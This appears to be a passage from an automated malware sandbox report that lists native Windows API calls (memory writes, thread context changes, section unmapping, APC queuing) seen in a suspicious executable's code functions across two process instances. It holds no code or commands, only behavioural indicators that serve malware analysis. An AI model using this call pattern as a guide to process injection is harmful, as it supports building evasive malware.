      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A560 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A540 NtDelayExecution,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A5F0 NtReadVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A410 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A4A0 NtUnmapViewOfSection,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A480 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A360 NtAllocateVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A3E0 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A240 NtReadFile,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A2D0 NtClose,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A710 NtQuerySection
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A780 NtOpenDirectoryObject
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A650 NtQueueApcThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A6D0 NtCreateProcessEx
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A520 NtEnumerateKey
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32BD40 NtSuspendThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A5A0 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A430 NtQueryVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32B410 NtOpenProcessToken
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A470 NtSetInformationFile
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32B470 NtOpenThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A460 NtOpenProcess
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32ACE0 NtCreateMutant
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A310 NtEnumerateValueKey
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A370 NtQueryInformationProcess
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A350 NtQueryValueKey
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A3D0 NtCreateKey
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32BA30 NtSetContextThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A220 NtWaitForSingleObject
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A260 NtWriteFile
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A2F0 NtQueryInformationFile
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A800 NtSetValueKey
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32B0B0 NtGetContextThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_005629FE NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_00562DAB NtSetInformationThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_005601C7 NtSetInformationThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_005629FF NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_00560301 NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_00560333 NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_00562DD7 NtSetInformationThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A720 NtResumeThread,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A700 NtProtectVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A750 NtCreateFile,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A610 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A6A0 NtCreateSection,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A560 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A540 NtDelayExecution,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A5F0 NtReadVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A410 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A4A0 NtUnmapViewOfSection,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A480 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A360 NtAllocateVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A3E0 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A240 NtReadFile,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A2D0 NtClose,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A710 NtQuerySection
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A780 NtOpenDirectoryObject
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A650 NtQueueApcThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A6D0 NtCreateProcessEx
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A520 NtEnumerateKey
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31BD40 NtSuspendThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A5A0 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A430 NtQueryVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31B410 NtOpenProcessToken
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31B470 NtOpenThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A470 NtSetInformationFile
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A460 NtOpenProcess
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31ACE0 NtCreateMutant
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A310 NtEnumerateValueKey
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A370 NtQueryInformationProcess
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A350 NtQueryValueKey
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A3D0 NtCreateKey
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31BA30 NtSetContextThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A220 NtWaitForSingleObject
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A260 NtWriteFile
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A2F0 NtQueryInformationFile
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31A800 NtSetValueKey
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_1F31B0B0 NtGetContextThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_005629FE NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_00562DAB NtSetInformationThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_005601C7 NtSetInformationThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_005629FF NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_00560301 NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_00560333 NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 21_2_00562DD7 NtSetInformationThread